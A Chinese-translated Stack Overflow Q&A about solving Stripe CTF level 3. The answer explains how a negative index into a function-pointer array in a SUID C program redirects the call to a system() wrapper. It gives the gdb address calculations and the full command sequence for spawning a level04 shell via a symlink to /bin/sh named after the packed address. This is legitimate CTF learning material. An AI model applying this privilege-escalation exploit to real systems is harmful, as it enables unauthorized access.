gpt4 book ai didi

创建指向内存地址的符号链接(symbolic link)。 (剧透 : Stripe CTF contest)

转载 作者:太空狗 更新时间:2023-10-29 15:46:08 24 4
gpt4 key购买 nike

所以我正在尝试参加 Stripe CTF 竞赛,但我对安全性一无所知,所以当我遇到问题时,我查看了问题 3。我仍然不明白它是如何工作的。 黑客攻击的目标是通过使用设置了 SUID 位的应用程序访问不同用户文件中的密码。这是应用程序的(简化)代码:

#define NUM_FNS 4
typedef int (*fn_ptr)(const char *);
int to_upper(const char *str)
int to_lower(const char *str)
int capitalize(const char *str)
int length(const char *str)

int run(const char *str)
{
// This function is now deprecated.
return system(str);
}

int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
char buf[64];
// Truncate supplied string
strncpy(buf, user_string, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = '\0';
return fns[index](buf);
}

int main(int argc, char **argv)
{
int index;
fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};

if (argc != 3) {
exit(-1);
}

// Parse supplied index
index = atoi(argv[1]);

if (index >= NUM_FNS) {
exit(-1);
}

return truncate_and_call(fns, index, argv[2]);
}

这是我找到的解决方案:http://pastebin.com/VJ4xpawq

我很困惑为什么会这样。如果我使用类似 ./level03 -28 "echo foo;"的代码运行代码我得到一个段错误。还有,为什么他的printf函数里的内存地址是反的????

我迷路了,想学习。先感谢您。 :)

最佳答案

这段代码的目标是执行

system("/bin/sh");

由于可执行文件的 UID 为“level04”,因此它生成的 shell 也将具有“level04”的 UID。

这可以通过运行“已弃用的”run 函数来完成:

run("/bin/sh");

我们注意到在函数 truncate_and_call 中,我们将调用一个由用户输入选择的函数:

return fns[index](buf);

因此,我们尝试创建一个内存位置并组成一个索引,这样fns[index] == &run

索引

进行边界检查
  if (index >= NUM_FNS) {
exit(-1);
}

这意味着我们提供的恶意 index 必须小于 4——但它可能是负数!因此,我们的目标变成:

  1. fns 之前找到一个可写的内存位置
  2. &run的内存地址写入其中
  3. buf 指定为启动 shell 的内容。

为了检查地址,我们在 gdb 中运行程序并在 truncate_and_call 处中断:

$ gdb --quiet --args a.out 1 something
Reading symbols from ~/a.out...done.
(gdb) b truncate_and_call
Breakpoint 1 at 0x80484c5: file 3.c, line 21.
(gdb) r
Starting program: ~/a.out 1 something

Breakpoint 1, truncate_and_call (fns=0xffbffa6c, index=1, user_string=0xffc019ab "something") at 3.c:21
21 strncpy(buf, user_string, sizeof(buf) - 1);
(gdb) list
16
17 int truncate_and_call(fn_ptr *fns, int index, char *user_string)
18 {
19 char buf[64];
20 // Truncate supplied string
21 strncpy(buf, user_string, sizeof(buf) - 1);
22 buf[sizeof(buf) - 1] = '\0';
23 return fns[index](buf);
24 }
25

注意这里还有一个局部变量buf,它:

(gdb) p &buf$2 = (char (*)[64]) 0xffbffa00

has an address before fns. So step 1 is done. We only need to check the index, which is

(gdb) p (0xffbffa6c - 0xffbffa00) / 4   # 4 == sizeof(*fns)$4 = 27

So the next question is how to write the memory location of &run into buf. This is easy, because buf is just a strcpy of user_string, the second argument of the function. Check that the address of run is

(gdb) p &run$5 = (int (*)(const char *)) 0x80484ac 

In a little-endian system, this address is encoded as the string "\xAC\x84\x04\x08". This string can be obtained from the shell using the printf command, or $'...':

$ echo `printf "\xac\x84\x04\x08"`
��
$ echo $'\xac\x84\x04\x08'
��

所以,最后一步是让它启动 shell。因为如果我们把"\xac\x84\x04\x08"赋值给buf,实际上调用的是

run("\xac\x84\x04\x08");

但我们想要 "/bin/sh",而不是 "\xac\x84\x04\x08"!通过将 /bin/sh 链接到名为 "\xac\x84\x04\x08" 的文件,并将该文件的目录添加到$路径:

$ export PATH=`pwd`:$PATH
$ ln -s /bin/sh $'\xac\x84\x04\x08'
$ $'\xac\x84\x04\x08'
sh-4.2$ whoami
level03

因此整个解决方案是:

$ export PATH=`pwd`:$PATH
$ ln -s /bin/sh $'\xac\x84\x04\x08'
$ /levels/level03 -27 $'\xac\x84\x04\x08'
sh-4.2$ whoami
level04

(注意:数字有点不同,因为我在我的机器上运行它们而不是 Stripe 的。)


此外,您在 ./level03 -28 "echo foo;" 中遇到了一个段错误,因为它会将要运行的地址解释为 0x6f686365( 4 字节 'echo'),这是一个无效地址。

关于创建指向内存地址的符号链接(symbolic link)。 (剧透 : Stripe CTF contest),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/9430017/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com